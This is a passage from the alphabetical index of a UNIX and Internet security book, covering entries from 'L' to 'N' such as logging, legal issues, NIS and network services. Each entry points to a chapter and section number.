15.3.1. Assigning Additional UUCP Logins<br />

-f option : 10.1.3.1. Pruning the wtmp file<br />

lastcomm program<br />

10.2. The acct/pacct Process Accounting File<br />

10.2.2. Accounting with BSD<br />

lastlog file : 10.1.1. lastlog File<br />

laws<br />

26. Computer <strong>Sec</strong>urity and U.S. Law<br />

26.4.7. Harassment, Threatening Communication, and Defamation<br />

backups and : 7.1.7. Legal Issues<br />

checklist for : A.1.1.25. Chapter 26: Computer <strong>Sec</strong>urity and U.S. Law<br />

copyright<br />

9.2.1. Comparison Copies<br />

26.4.2. Copyright Infringement<br />

26.4.2.1. Software piracy and the SPA<br />

criminal prosecution<br />

26.2. Criminal Prosecution<br />

26.2.7. A Final Note on Criminal Actions<br />

Electronic Communications Privacy Act (ECPA) : 26.2.3. Federal Computer Crime Laws<br />

encryption<br />

6.7. Encryption and U.S. Law<br />

6.7.2. Cryptography and Export Controls<br />

12.2.6.3. Portables<br />

enforcement agencies : 14.4.4.1. Kinds of eavesdropping<br />

export<br />

6.4.4.1. Use and export of DES<br />

6.7.2. Cryptography and Export Controls<br />

26.4.1. Munitions Export<br />

federal enforcement<br />

26.2.2. Federal Jurisdiction<br />

26.2.3. Federal Computer Crime Laws<br />

indecent material : 26.4.5. Pornography and Indecent Material<br />

liability<br />

26.4. Other Liability<br />

26.4.7. Harassment, Threatening Communication, and Defamation<br />

monitoring keystrokes : 24.2.3. Monitoring the Intruder<br />

non-citizen access : 26.4.1. Munitions Export<br />

patents : 26.4.4. Patent Concerns<br />

for portable computers : 12.2.6.3. Portables<br />

resources on : D.1.1. Other Computer References<br />

search warrants<br />

26.2.4. Hazards of Criminal Prosecution<br />

26.2.5. If You or One of Your Employees Is a Target of an Investigation...<br />

smoking : 12.2.1.2. Smoke<br />

state and local enforcement : 26.2.1. The Local Option<br />

trademarks : 26.4.3. Trademark Violations<br />

vendor liability : 18.5.2. Trusting Your Software Vendor<br />

lawsuits (civil) : 26.3. Civil Actions<br />

leased telephone lines : 14.5.4. Physical Protection of Modems<br />

least privilege<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

13.2.5. Least Privilege and Separation of Duties<br />

Lee, Ying-Da : 22.4. SOCKS<br />

Lesk, Mike<br />

1.3. History of <strong>UNIX</strong><br />

15.2. Versions of UUCP<br />

liability, legal<br />

26.4. Other Liability<br />

26.4.7. Harassment, Threatening Communication, and Defamation<br />

/lib directory : 11.5.3.6. Other files<br />

license agreements : 18.5.2. Trusting Your Software Vendor<br />

comparison copies and : 9.2.1. Comparison Copies<br />

lie-detector tests : 13.1. Background Checks<br />

lightning<br />

12.2. Protecting Computer Hardware<br />

12.2.1.9. Lightning<br />

limit command : 25.2.5. Soft Process Limits: Preventing Accidental Denial of Service<br />

Limit command (&lt;Limit&gt;) : 18.3.2. Commands Within the &lt;Limit&gt; Block<br />

limited user access : 8.1.5.1. Limited users<br />

link-level security : 16.3.1. Link-level <strong>Sec</strong>urity<br />

links<br />

encryption of : 18.4.1. Eavesdropping Over the Wire<br />

link-level security : 16.3.1. Link-level <strong>Sec</strong>urity<br />

static : 23.4. Tips on Writing SUID/SGID Programs<br />

symbolic, following (Web)<br />

18.2.2.2. Additional configuration issues<br />

18.3.2. Commands Within the &lt;Limit&gt; Block<br />

lint program : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

LINUX operating system<br />

1.3. History of <strong>UNIX</strong><br />

3.3. Entering Your Password<br />

23.1.2.1. What they found<br />

ext2 filesystem : 25.2.2.6. Reserved space<br />

random number generators : 23.7.4. Other random number generators<br />

Live Script : 18.5.2. Trusting Your Software Vendor<br />

load shedding : 23.3. Tips on Writing Network Programs<br />

local<br />

area networks (LANs)<br />

16.1. Networking<br />

16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

authentication (NIS+) : 19.5.4. Using NIS+<br />

law enforcement : 26.2.1. The Local Option<br />

storage<br />

12.3.4. Protecting Local Storage<br />

12.3.4.5. Function keys<br />

users, and USERFILE : 15.4.1.2. USERFILE entries for local users<br />

lock program : 12.3.5.2. X screen savers<br />

locked accounts : 3.3. Entering Your Password<br />

locking files : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

log files<br />

11.5.3.5. System initialization files<br />

(see also logging)<br />

access_log<br />

10.3.5. access_log Log File<br />

18.4.2. Eavesdropping Through Log Files<br />

aculog : 10.3.1. aculog File<br />

agent_log file : 18.4.2. Eavesdropping Through Log Files<br />

backing up : 10.2.2. Accounting with BSD<br />

lastlog : 10.1.1. lastlog File<br />

managing : 10.8. Managing Log Files<br />

manually generated<br />

10.7. Handwritten Logs<br />

10.7.2.2. Informational material<br />

per-machine : 10.7.2. Per-Machine Logs<br />

per-site : 10.7.1. Per-Site Logs<br />

refer_log file : 18.4.2. Eavesdropping Through Log Files<br />

sulog : (see sulog file)<br />

system clock and : 17.3.14. Network Time Protocol (NTP) (UDP Port 123)<br />

tracking intruders with : 24.3. The Log Files: Discovering an Intruder's Tracks<br />

/usr/adm/messages : 10.2.3. messages Log File<br />

utmp and wtmp<br />

10.1.2. utmp and wtmp Files<br />

10.1.3.1. Pruning the wtmp file<br />

uucp : 10.3.4. uucp Log Files<br />

/var/adm/acct : 10.2. The acct/pacct Process Accounting File<br />

/var/adm/loginlog : 10.1.4. loginlog File<br />

of Web servers : 18.4.2. Eavesdropping Through Log Files<br />

xferlog : 10.3.3. xferlog Log File<br />

logdaemon package : 17.3.18.5. Searching for .rhosts files<br />

logger command : 10.5.3. syslog Messages<br />

logging<br />

7.1.1.1. A taxonomy of computer failures<br />

10. Auditing and Logging<br />

10.8. Managing Log Files<br />

11.5.3.5. System initialization files<br />

21.5. Special Considerations<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

(see also log files)<br />

across networks : 10.5.2.2. Logging across the network<br />

archiving information : 7.4.2. Simple Archives<br />

breakins : 24.1.2. Rule #2: DOCUMENT<br />

C2 audit : 10.1. The Basic Log Files<br />

checklist for : A.1.1.9. Chapter 10: Auditing and Logging<br />

critical messages<br />

10.5.3. syslog Messages<br />

10.5.3.1. Beware false log entries<br />

downloaded files<br />

10.3.3. xferlog Log File<br />

10.3.5. access_log Log File<br />

failed su attempts : 4.3.7. The Bad su Log<br />

file format : 8.2. Monitoring File Format<br />

files transferred by FTP : 10.3.3. xferlog Log File<br />

to hardcopy device : 10.5.2.1. Logging to a printer<br />

individual users<br />

10.4. Per-User Trails in the Filesystem<br />

10.4.3. Network Setup<br />

manually<br />

10.7. Handwritten Logs<br />

10.7.2.2. Informational material<br />

mistyped passwords : 10.5.3. syslog Messages<br />

network services : 10.3.6. Logging Network Services<br />

outgoing mail : 10.4.2. Mail<br />

potentially criminal activity : 26.2.6. Other Tips<br />

Swatch program<br />

10.6. Swatch: A Log File Tool<br />

10.6.2. The Swatch Configuration File<br />

E.4.9. Swatch<br />

syslog facility<br />

10.5. The <strong>UNIX</strong> System Log (syslog) Facility<br />

10.5.3.1. Beware false log entries<br />

UUCP : 10.3.4. uucp Log Files<br />

what not to log : 10.5.3. syslog Messages<br />

logging in<br />

C.5. Starting Up <strong>UNIX</strong> and Logging In<br />

C.5.3. Running the User's Shell<br />

FTP access without : 17.3.2.7. Allowing only FTP access<br />

Kerberos system : 19.6.1.1. Initial login<br />

last program<br />

10.1.3. last Program<br />

10.1.3.1. Pruning the wtmp file<br />

lastlog file : 10.1.1. lastlog File<br />

passwords : 3.3. Entering Your Password<br />

preventing<br />

8.4. Managing Dormant Accounts<br />

8.4.3. Finding Dormant Accounts<br />

restricting : 8.3. Restricting Logins<br />

with <strong>Sec</strong>ure RPC : 19.3.3. Using <strong>Sec</strong>ure RPC<br />

startup file attacks<br />

11.5.2. Start-up File Attacks<br />

11.5.2.7. Other initializations<br />

logging out with <strong>Sec</strong>ure RPC : 19.3.3. Using <strong>Sec</strong>ure RPC<br />

logic bombs<br />

11.1. Programmed Threats: Definitions<br />

11.1.3. Logic Bombs<br />

27.2.2. Viruses on the Distribution Disk<br />

.login file<br />

8.5.1. <strong>Sec</strong>ure Terminals<br />

11.5.2.1. .login, .profile, /etc/profile<br />

24.4.1.6. Changes to startup files<br />

login program<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

11.1.2. Back Doors and Trap Doors<br />

19.5.4. Using NIS+<br />

26.2.6. Other Tips<br />

27.1.2. Trusting Trust<br />

logindevperm file : 17.3.21.1. /etc/fbtab and /etc/logindevperm<br />

loginlog file : 10.1.4. loginlog File<br />

logins<br />

authentication : 17.3.5. TACACS (UDP Port 49)<br />

FTP : 17.3.2. (FTP) File Transfer Protocol (TCP Ports 20 and 21)<br />

UUCP, additional : 15.3.1. Assigning Additional UUCP Logins<br />

logins command : 8.1.1. Accounts Without Passwords<br />

-d option : 8.2. Monitoring File Format<br />

-p option : 8.2. Monitoring File Format<br />

LOGNAME= command<br />

15.5.1.3. A Sample Permissions file<br />

15.5.2. Permissions Commands<br />

.logout file : 19.3.3. Using <strong>Sec</strong>ure RPC<br />

long distance service<br />

14.5.4. Physical Protection of Modems<br />

17.3.3. TELNET (TCP Port 23)<br />

losses, cost of preventing<br />

2.3. Cost-Benefit Analysis<br />

2.3.4. Convincing Management<br />

lp (user) : 4.1. Users and Groups<br />

lpd system : 17.3.18.6. /etc/hosts.lpd file<br />

lrand48 function : 23.7.3. drand48 ( ), lrand48 ( ), and mrand48 ( )<br />

ls command<br />

5.1.4. Using the ls Command<br />

5.1.5. File Times<br />

9.2.2. Checklists and Metadata<br />

-c option : 5.1.5. File Times<br />

-d option : 9.2.2.1. Simple listing<br />

-e option : 5.2.5.1. AIX Access Control Lists<br />

-F option : 5.1.4. Using the ls Command<br />

-g option : 5.1.4. Using the ls Command<br />

-H option : 5.9.2. Context-Dependent Files<br />

-i option : 9.2.2.1. Simple listing<br />

-l option<br />

5.1.4. Using the ls Command<br />

5.2.5.1. AIX Access Control Lists<br />

5.5.1. SUID, SGID, and Sticky Bits<br />

-q option : 5.4. Using Directory Permissions<br />

-u option : 5.1.5. File Times<br />

-c option : 24.4.1.6. Changes to startup files<br />

-H option : 24.4.1.7. Hidden files and directories<br />

-l option : 24.4.1.6. Changes to startup files<br />

lsacl command : 5.2.5.2. HP-UX access control lists<br />

lsof program : 25.2.2.7. Hidden space<br />

lstat function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

Lucifer algorithm<br />

6.4.4. DES<br />

6.4.4.3. DES strength<br />

LUCIFER cipher : 6.4.4. DES<br />

Index: M<br />

MAC (Mandatory Access Controls) : 4.1.3. Groups and Group Identifiers (GIDs)<br />

MACH operating system : 1.3. History of <strong>UNIX</strong><br />

machine name : 16.2.3. Hostnames<br />

MACHINE= command<br />

15.5.1.2. Name-value pairs<br />

15.5.2. Permissions Commands<br />

Macintosh, Web server on : 18.2. Running a <strong>Sec</strong>ure Server<br />

macro virus : (see viruses)<br />

magic cookies : 17.3.21.4. Using Xauthority magic cookies<br />

magic number : 5.1.7. File Permissions in Detail<br />

mail<br />

11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or aliases.pag<br />

(see also sendmail)<br />

accepted by programs : 17.3.4.1. sendmail and security<br />

action, in Swatch program : 10.6.2. The Swatch Configuration File<br />

alias back door : 11.1.2. Back Doors and Trap Doors<br />

aliases : (see aliases)<br />

copyrights on : 26.4.2. Copyright Infringement<br />

Electronic Communications Privacy Act (ECPA) : 26.2.3. Federal Computer Crime Laws<br />

firewalls : 21.4.2. Electronic Mail<br />

forwarding (UUCP) : 15.6.1. Mail Forwarding for UUCP<br />

harassment via : 26.4.7. Harassment, Threatening Communication, and Defamation<br />

logging : 10.4.2. Mail<br />

message flooding : 25.3.2. Message Flooding<br />

phantom, monitoring : 17.3.4.2. Using sendmail to receive email<br />

receiving by sendmail : 17.3.4.2. Using sendmail to receive email<br />

sending via CGI scripts : 18.2.3.3. Sending mail<br />

sent directly to file : 15.7. Early <strong>Sec</strong>urity Problems with UUCP<br />

startup file attacks : 11.5.2.5. .forward, .procmailrc<br />

mail command : 15.1.3. mail Command<br />

Mail_Aliases table (NIS+) : 19.5.3. NIS+ Tables<br />

mailing lists<br />

E.1. Mailing Lists<br />

E.1.3.10. WWW-security<br />

maintenance mode : C.5.1. Process #1: /etc/init<br />

maintenance personnel : 13.3. Outsiders<br />

makedbm program : 19.4.4.1. Setting up netgroups<br />

malware : 11.1. Programmed Threats: Definitions<br />

man pages : 2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

management, role of<br />

2.3.4. Convincing Management<br />

2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

MANs (Metropolitan Area Networks) : 16.1. Networking<br />

manual logging<br />

10.7. Handwritten Logs<br />

10.7.2.2. Informational material<br />

manual pages : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

maps, NIS : (see NIS)<br />

Massey, James L. : 6.4.1. Summary of Private Key Systems<br />

Master mode (uucico) : 15.1.4. How the UUCP Commands Work<br />

master server<br />

19.4. Sun's Network Information Service (NIS)<br />

(see also NIS)<br />

MCERT : F.3.4.21. Motorola, Inc. and subsidiaries<br />

MCI Corporation : F.3.4.19. MCI Corporation<br />

MD2 algorithm : 6.5.4.1. MD2, MD4, and MD5<br />

MD4 algorithm : 6.5.4.1. MD2, MD4, and MD5<br />

MD5 algorithm<br />

6.5.2. Using Message Digests<br />

6.5.4.1. MD2, MD4, and MD5<br />

23.5.1. Use Message Digests for Storing Passwords<br />

23.9. A Good Random Seed Generator<br />

digital signatures versus : 6.6.3.6. PGP detached signatures<br />

in POP : 17.3.10. Post Office Protocol (POP) (TCP Ports 109 and 110)<br />

media : 12.3.3. Other Media<br />

damaged by smoke : 12.2.1.2. Smoke<br />

destroying : 12.3.2.3. Sanitize your media before disposal<br />

failure of : 7.1.4. Guarding Against Media Failure<br />

hard/soft disk quotas : 25.2.2.5. Using quotas<br />

print through process : 12.3.2.1. Verify your backups<br />

rotating for backups : 7.1.3. Types of Backups<br />

rotation of : 7.2.1.2. Media rotation<br />

sanitizing : 12.3.2.3. Sanitize your media before disposal<br />

viruses from : 11.1.5. Viruses<br />

meet-in-the-middle attacks : 6.4.5.1. Double DES<br />

memory<br />

25.2.2. Disk Attacks<br />

25.2.2.8. Tree-structure attacks<br />

hidden space : 25.2.2.7. Hidden space<br />

reserved space : 25.2.2.6. Reserved space<br />

swap space : 25.2.3. Swap Space Problems<br />

/tmp directory and : 25.2.4. /tmp Problems<br />

tree-structure attacks : 25.2.2.8. Tree-structure attacks<br />

Merkle, Ralph : 6.4.5.1. Double DES<br />

Message Authentication Code (MAC) : 6.5.5.2. Message authentication codes<br />

message digests<br />

6.5. Message Digests and Digital Signatures<br />

6.5.2. Using Message Digests<br />

9.2.3. Checksums and Signatures<br />

23.5.1. Use Message Digests for Storing Passwords<br />

Tripwire package<br />

9.2.4. Tripwire<br />

9.2.4.2. Running Tripwire<br />

message flooding : 25.3.2. Message Flooding<br />

messages log file : 10.2.3. messages Log File<br />

meta characters : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

metadata<br />

9.2.2. Checklists and Metadata<br />

9.2.2.2. Ancestor directories<br />

Metropolitan Area Networks (MANs) : 16.1. Networking<br />

MH (mail handler) : 11.5.2.5. .forward, .procmailrc<br />

Micro-BIT Virus Center : F.3.4.16. Germany: Southern area<br />

Miller, Barton : 23.1.2. An Empirical Study of the Reliability of <strong>UNIX</strong> Utilities<br />

MILNET : F.3.4.20. MILNET<br />

MIME : 11.1.5. Viruses<br />

MIT-KERBEROS-5 authentication : 17.3.21.3. The xhost facility<br />

Mitnick, Kevin : 27.2.6. Network Providers that Network Too Well<br />

mkpasswd program : 8.8.4. Password Generators<br />

mktemp function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

MLS (Multilevel <strong>Sec</strong>urity) environment : "<strong>Sec</strong>ure" Versions of <strong>UNIX</strong><br />

mobile network computing : 8.7. One-Time Passwords<br />

modems<br />

14. Telephone <strong>Sec</strong>urity<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

callback setups<br />

14.4.2.<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

clogging : 25.3.4. Clogging<br />

encrypting : 14.6. Additional <strong>Sec</strong>urity for Modems<br />

hanging up : (see signals)<br />

physical security of<br />

14.5.4. Physical Protection of Modems<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

recording call information : 10.3.1. aculog File<br />

tracing connections<br />

24.2.4. Tracing a Connection<br />

24.2.4.2. How to contact the system administrator of a computer you don't know<br />

<strong>UNIX</strong> and<br />

14.5. Modems and <strong>UNIX</strong><br />

modification times<br />

5.1.2. Inodes<br />

14.5.3.3. Privilege testing<br />

5.1.5. File Times<br />

7.4.7. inode Modification Times<br />

9.2.2. Checklists and Metadata<br />

monitoring<br />

hardware for : (see detectors)<br />

intruders : 24.2.3. Monitoring the Intruder<br />

performance : 13.2.3. Performance Reviews and Monitoring<br />

security : (see logging)<br />

users : 26.2.6. Other Tips<br />

monitors and screen savers : 12.3.5.2. X screen savers<br />

Morris, Robert T.<br />

1. Introduction<br />

8.6. The <strong>UNIX</strong> Encrypted Password System<br />

17.4. <strong>Sec</strong>urity Implications of Network Services<br />

motd file : 26.2.6. Other Tips<br />

Motorola, Inc. : F.3.4.20. MILNET<br />

Motorola, Inc. and subsidiaries : F.3.4.21. Motorola, Inc. and subsidiaries<br />

mount command : 20.3. Client-Side NFS <strong>Sec</strong>urity<br />

-nodev option : 5.5.5. Turning Off SUID and SGID in Mounted Filesystems<br />

-nosuid option : 5.5.5. Turning Off SUID and SGID in Mounted Filesystems<br />

mounted filesystems : 5.5.5. Turning Off SUID and SGID in Mounted Filesystems<br />

mounting filesystems : (see directories)<br />

mrand48 function : 23.7.3. drand48 ( ), lrand48 ( ), and mrand48 ( )<br />

mtime<br />

5.1.2. Inodes<br />

5.1.5. File Times<br />

9.2.2. Checklists and Metadata<br />

24.4.1.6. Changes to startup files<br />

MUDs (Multiuser Dungeons) : 17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

Muffet, Alec : 10.5.3.1. Beware false log entries<br />

multicast groups : 16.2.1.2. Classical network addresses<br />

MULTICS (Multiplexed Information and Computing Service) : 1.3. History of <strong>UNIX</strong><br />

multilevel security<br />

1.3. History of <strong>UNIX</strong><br />

2.4.4.7. Defend in depth<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

17.2. Controlling Access to Servers<br />

multitasking<br />

1.4. <strong>Sec</strong>urity and <strong>UNIX</strong><br />

C.1.3.3. Process priority and niceness<br />

multiuser operating systems : 1.4. <strong>Sec</strong>urity and <strong>UNIX</strong><br />

multiuser workstations : 17.3.21.1. /etc/fbtab and /etc/logindevperm<br />

munitions export : 26.4.1. Munitions Export<br />

MX record type : 17.3.6. Domain Name System (DNS) (TCP and UDP Port 53)<br />

MYNAME= command : 15.5.2. Permissions Commands<br />

Index: N<br />

name service<br />

16.2.6. Name Service<br />

16.2.6.2. Other naming services<br />

security and : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

name-value pairs in BNU UUCP : 15.5.1.2. Name-value pairs<br />

named daemon : 16.2.6.1. DNS under <strong>UNIX</strong><br />

named nameserver : 17.3.6.2. DNS nameserver attacks<br />

named-xfer program : 16.2.6.1. DNS under <strong>UNIX</strong><br />

named.boot file<br />

17.3.6.1. DNS zone transfers<br />

17.3.6.2. DNS nameserver attacks<br />

names<br />

choosing UUCP : 15.5.2. Permissions Commands<br />

computer<br />

16.2.3. Hostnames<br />

16.2.3.1. The /etc/hosts file<br />

user : (see usernames)<br />

nameserver attacks, DNS : 17.3.6.2. DNS nameserver attacks<br />

nameserver cache loading : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

NASA<br />

Ames Research Center : F.3.4.22. NASA: Ames Research Center<br />

NASA: Goddard Space Flight Center : F.3.4.23. NASA: Goddard Space Flight Center<br />

National Aeronautics and Space Administration : (see NASA)<br />

National Computer <strong>Sec</strong>urity Center (NCSC) : F.2.1. National Institute of Standards and Technology (NIST)<br />

National Institute of Standards and Technology : (see NIST)<br />

National Science Foundation Network : (see networks, NSFNET)<br />

national security : 26.2.2. Federal Jurisdiction<br />

natural disasters<br />

1.1. What Is Computer <strong>Sec</strong>urity?<br />

7.1.1.1. A taxonomy of computer failures<br />

7.1.6.1. Physical security for backups<br />

12.2.1.1. Fire<br />

(see also physical security)<br />

accidents : 12.2.2. Preventing Accidents<br />

earthquakes : 12.2.1.4. Earthquake<br />

fires<br />

12.2.1.1. Fire<br />

12.2.1.2. Smoke<br />

lightning<br />

12.2. Protecting Computer Hardware<br />

12.2.1.9. Lightning<br />

natural gas : 12.2.1.5. Explosion<br />

Naval Computer Incident Response Team (NAVCIRT) : F.3.4.44. U.S. Department of the Navy<br />

ncheck command : 5.5.4.1. The ncheck command<br />

-s option<br />

5.5.4.1. The ncheck command<br />

5.6. Device Files<br />

NCSA HTTPD server : 10.3.5. access_log Log File<br />

NCSA server : (see Web servers)<br />

NCSC (National Computer <strong>Sec</strong>urity Center) : F.2.1. National Institute of Standards and Technology (NIST)<br />

needexpnhelo (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

needmailhelo (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

needvrfyhelo (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

nested directories : 25.2.2.8. Tree-structure attacks<br />

Netgroup table (NIS+) : 19.5.3. NIS+ Tables<br />

netgroups, NIS<br />

19.4.4. NIS Netgroups<br />

19.4.4.6. NIS is confused about "+"<br />

limiting imported accounts : 19.4.4.2. Using netgroups to limit the importing of accounts<br />

NetInfo<br />

3.2.2. The /etc/passwd File and Network Databases<br />

16.2.6.2. Other naming services<br />

Netmasks table (NIS+) : 19.5.3. NIS+ Tables<br />

netnews, firewalls and : 21.4.3. Netnews<br />

.netrc file : 10.4.3. Network Setup<br />

Netscape Navigator<br />

encryption system of : 18.4.1. Eavesdropping Over the Wire<br />

random number generator : 23.8. Picking a Random Seed<br />

netstat command<br />

17.5. Monitoring Your Network with netstat<br />

24.2.1. Catching One in the Act<br />

24.2.4. Tracing a Connection<br />

-a option : 17.5. Monitoring Your Network with netstat<br />

-n option : 17.5. Monitoring Your Network with netstat<br />

network connections : 17.3.3. TELNET (TCP Port 23)<br />

network databases : 3.2.2. The /etc/passwd File and Network Databases<br />

Network Filesystem : (see NFS)<br />

network filesystems : 5.5.5. Turning Off SUID and SGID in Mounted Filesystems<br />

Network Information Center (NIC) : 24.2.4.2. How to contact the system administrator of a computer you don't know<br />

Network Information System : (see NIS)<br />

Network News Transport Protocol : (see NNTP)<br />

network providers : 27.2.6. Network Providers that Network Too Well<br />

network services<br />

17. TCP/IP Services<br />

17.7. Summary<br />

23.3. Tips on Writing Network Programs<br />

DNS : (see DNS)<br />

encryption with : 17.4. <strong>Sec</strong>urity Implications of Network Services<br />

finger : (see finger command)<br />

FTP : (see FTP)<br />

NNTP : (see NNTP)<br />

NTP : (see NTP)<br />

passwords for : 17.4. <strong>Sec</strong>urity Implications of Network Services<br />

POP : (see POP)<br />

root account with : 17.4. <strong>Sec</strong>urity Implications of Network Services<br />

securing : 19.1. <strong>Sec</strong>uring Network Services<br />

SMTP : (see SMTP)<br />

SNMP : (see SNMP)<br />

spoofing : 17.5. Monitoring Your Network with netstat<br />

systat : 17.3.1. systat (TCP Port 11)<br />

table of : G. Table of IP Services<br />

Telnet : (see Telnet utility)<br />

TFTP : (see TFTP)<br />

UUCP over TCP : 17.3.20. UUCP over TCP (TCP Port 540)<br />

Network Time Protocol : (see NTP)<br />

network weaving : 16.1.1.1. Who is on the <strong>Internet</strong>?<br />

networks<br />

10Base-T : 12.3.1.2. Eavesdropping by Ethernet and 10Base-T<br />

allowing threats from : 11.4. Entry<br />

ARPANET : 16.1.1. The <strong>Internet</strong><br />

backing up<br />

7.2.2. Small Network of Workstations and a Server<br />

7.2.4. Large Service-Based Networks with Large Budgets<br />

backups across : 7.4.5. Backups Across the Net<br />

cables for : 12.2.4.2. Network cables<br />

checklist for<br />

A.1.1.15. Chapter 16: TCP/IP Networks<br />

A.1.1.16. Chapter 17: TCP/IP Services<br />

configuration files : 10.4.3. Network Setup<br />

connectors for : 12.2.4.3. Network connectors<br />

cutting cables : 25.1. Destructive Attacks<br />

denial of service on<br />

25.3. Network Denial of Service Attacks<br />

25.3.4. Clogging<br />

disabling physically : 25.3.3. Signal Grounding<br />

<strong>Internet</strong> : 16.1.1. The <strong>Internet</strong><br />

LANs : (see LANs)<br />

logging across : 10.5.2.2. Logging across the network<br />

logging services of : 10.3.6. Logging Network Services<br />

MANs : 16.1. Networking<br />

mobile computing : 8.7. One-Time Passwords<br />

monitoring with netstat : 17.5. Monitoring Your Network with netstat<br />

NSFNET : 16.1.1. The <strong>Internet</strong><br />

packet-switching : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

scanning : 17.6. Network Scanning<br />

security references : D.1.8. Network Technology and <strong>Sec</strong>urity<br />

services for : 11.1.2. Back Doors and Trap Doors<br />

sniffers : 16.3. IP <strong>Sec</strong>urity<br />

spoofed connection : 8.5.3.1. Trusted path<br />

TCP/IP : (see TCP/IP, networks)<br />

<strong>UNIX</strong> and : 16.1.2. Networking and <strong>UNIX</strong><br />

UUCP over : 15.8. UUCP Over Networks<br />

WANs : 16.1. Networking<br />

Networks table (NIS+) : 19.5.3. NIS+ Tables<br />

networks, computer : 1.4.3. Add-On Functionality Breeds Problems<br />

Neumann, Peter : 1.3. History of <strong>UNIX</strong><br />

newgrp command : 4.1.3.2. Groups and older AT&T <strong>UNIX</strong><br />

newkey -u command<br />

19.3.2.1. Creating passwords for users<br />

19.5.4.2. When a user's passwords don't match<br />

news : (see Usenet)<br />

news (user) : 4.1. Users and Groups<br />

newsgroups, defamation/harassment via : 26.4.7. Harassment, Threatening Communication, and Defamation<br />

NEXTSTEP Window Server (NSWS) : 17.3.16. NEXTSTEP Window Server (NSWS) (TCP Port 178)<br />

NFS (Network Filesystem) : 19. RPC, NIS, NIS+, and Kerberos<br />

authentication and<br />

19.2.2. RPC Authentication<br />

19.2.2.4. AUTH_KERB<br />

checklist for : A.1.1.19. Chapter 20: NFS<br />

file permissions : 5.1.7. File Permissions in Detail<br />

find command on : 5.5.4. Finding All of the SUID and SGID Files<br />

-local option : 11.6.1.2. Writable system files and directories<br />

MOUNT : 20.1.1. NFS History<br />

<strong>Sec</strong>ure NFS : (see <strong>Sec</strong>ure NFS)<br />

server, and UUCP : 15.3. UUCP and <strong>Sec</strong>urity<br />

technical description of : 20.1.1. NFS History<br />

and trusted hosts : 17.3.18.2. The problem with trusted hosts<br />

-xdev option : 11.6.1.2. Writable system files and directories<br />

NIC (Network Information Center) : 24.2.4.2. How to contact the system administrator of a computer you don't know<br />

nice command : 25.2.1.2. System overload attacks<br />

nice numbers : C.1.3.3. Process priority and niceness<br />

NIS (Network Information Service)<br />

+ in<br />

19.4. Sun's Network Information Service (NIS)<br />

19.4.4.6. NIS is confused about "+"<br />

clients : 19.4. Sun's Network Information Service (NIS)<br />

domains : 19.4.3. NIS Domains<br />

maps : 19.4. Sun's Network Information Service (NIS)<br />

netgroups<br />

19.4.4. NIS Netgroups<br />

19.4.4.6. NIS is confused about "+"<br />

limiting imported accounts : 19.4.4.2. Using netgroups to limit the importing of accounts<br />

<strong>Sec</strong>ure RPC with<br />

19.3.2. Setting Up <strong>Sec</strong>ure RPC with NIS<br />

19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

spoofing : 19.4.4.5. Spoofing NIS<br />

UDP : 16.2.4.3. UDP<br />

Yellow Pages : 16.2.6.2. Other naming services<br />

NIS (Network Information System)<br />

3.2.2. The /etc/passwd File and Network Databases<br />

3.4. Changing Your Password<br />

NIS+<br />

19. RPC, NIS, NIS+, and Kerberos<br />

19.4. Sun's Network Information Service (NIS)<br />

19.4.5. Unintended Disclosure of Site Information with NIS<br />

3.2.2. The /etc/passwd File and Network Databases<br />

3.4. Changing Your Password<br />

16.2.6.2. Other naming services<br />

19.5. Sun's NIS+<br />

19.5.5. NIS+ Limitations<br />

integrity-checking software for : 19.5.5. NIS+ Limitations<br />

principals : 19.5.1. What NIS+ Does<br />

<strong>Sec</strong>ure RPC with<br />

19.3.2. Setting Up <strong>Sec</strong>ure RPC with NIS<br />

19.3.4. Limitations of <strong>Sec</strong>ure RPC<br />

nisaddcred command : 19.3.1.1. Proving your identity<br />

niscat command : 3.2.2. The /etc/passwd File and Network Databases<br />

nischown command : 19.5.4. Using NIS+<br />

nispasswd command<br />

3.4. Changing Your Password<br />

19.5.4. Using NIS+<br />

19.5.4.2. When a user's passwords don't match<br />

NIST (National Institute of Standards and Technology)<br />

F.2.1. National Institute of Standards and Technology (NIST)<br />

F.3.4.26. NIST (National Institute of Standards and Technology)<br />

NNTP (Network News Transport Protocol) : 17.3.13. Network News Transport Protocol (NNTP) (TCP Port 119)<br />

nobody (user)<br />

4.1. Users and Groups<br />

19.3.2.1. Creating passwords for users<br />

noexpn (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

noise, electrical : 12.2.1.8. Electrical noise<br />

nonadaptive modems : (see modems)<br />

nonblocking systems : 19.2. Sun's Remote Procedure Call (RPC)<br />

nonce : 23.3. Tips on Writing Network Programs<br />

nonrepudiation : 6.5. Message Digests and Digital Signatures<br />

NORDUNET : F.3.4.27. NORDUNET: Denmark, Sweden, Norway, Finland, Iceland<br />

NOREAD= command : 15.5.2. Permissions Commands<br />

Northwestern University : F.3.4.28. Northwestern University<br />

